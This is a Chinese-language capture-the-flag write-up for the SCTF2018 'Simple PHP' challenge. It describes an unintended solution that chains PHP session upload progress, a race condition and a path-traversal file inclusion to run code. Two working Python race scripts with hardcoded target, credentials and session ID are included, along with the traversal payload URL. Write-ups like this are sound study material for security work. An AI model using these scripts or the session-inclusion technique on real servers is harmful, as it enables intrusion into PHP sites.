session upload get shell

以SCTF2018 BabySyc - Simple PHP为例子

官方正解:
https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html

session upload是非预期解
关于session opload给几个参考链接：
https://xz.aliyun.com/t/2148
http://php.net/manual/zh/session.upload-progress.php
http://skysec.top/2018/04/04/amazing-phpinfo/

image.png

文件包含读phpinfo

http://116.62.71.206:52872/?f=phpinfo.php

image.png

开了 session.upload_progress.enabled = on 说明可以覆盖session
开了 clean up说明需要竞争
竞争脚本附在最下方

image.png

image.png

这里实际上包含的session内容是：

admin|i:1;upload_progress_|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;s:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;s:15:"bytes_processed";i:0;}}}

踩过的坑点

该题目调用了so来实现php的加解密，这里的文件包含调用了加密的index.php，所以要include也是include加密的php代码，但是这里的session只能控制，最多也只是将session中的该片段进行加密，session其余的内容未加密也会导致解密出错

幸亏这题目为了让选手能调用php伪协议，留了个直接php解析，不需要加密的"后门"，只判断了://

image.png

所以可以用payload绕过加解密步骤，来include session并直接调用php解析

http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_qc2kavokdjiiepu283hduivod2

image.png

image.png

SessionUpload.py

#!coding:utf-8
import requests
import time

url = 'http://116.62.71.206:52872/?f=login.php'
data = {'name':'admin','pass':'sctf2018_h656cDBkU2'}

r = requests.post(url,data = data)
PHPSESSID = r.cookies['PHPSESSID']
print 'input the PHPSESSID in include.py' +'\n' + PHPSESSID
time.sleep(10)

while 1:
    url = 'http://116.62.71.206:52872/?f=upload_sctf2018_C9f7y48M75.php'
    files = { 
    "PHP_SESSION_UPLOAD_PROGRESS" : (None,''),  
    
    "upload" : ("tmp.jpg", open("tmp.png", "rb"), "image/png"), 

    "submit" : (None,"submit")
    }  
    #proxies = {'http':'http://127.0.0.1:8080'}
    headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
    r = requests.post(url,files = files , headers = headers)
    print r.text
    print PHPSESSID
    #开了cleanup，需要竞争，并且保持回话的session

include.py

#!coding:utf-8

import requests
PHPSESSID = 'qc2kavokdjiiepu283hduivod2'
while 1:
    url = 'http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_' + PHPSESSID
    print url
    r = requests.get(url)
    if 'SCTF' in r.text:
        print r.text
        break